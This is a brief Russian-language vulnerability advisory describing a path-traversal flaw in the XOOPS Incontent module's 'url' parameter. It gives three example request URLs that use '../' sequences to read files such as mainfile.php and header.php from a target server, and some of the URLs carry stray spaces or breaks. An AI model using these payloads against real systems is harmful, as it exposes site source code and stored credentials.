Программа: XOOPS Incontent module

Уязвимость позволяет удаленному
пользователю просмотреть содержимое
произвольных сценариев на уязвимой системе.
Уязвимый модуль некорректно обрабатывает
параметр url. Удаленный пользователь может
просмотреть содержимое произвольных
сценариев на системе.

Пример:

http://[target]/modules/incontent/index.php? op=aff&optio n=0&url=../../../mainfile.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../.
./index.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../../header.php



Оставить мнение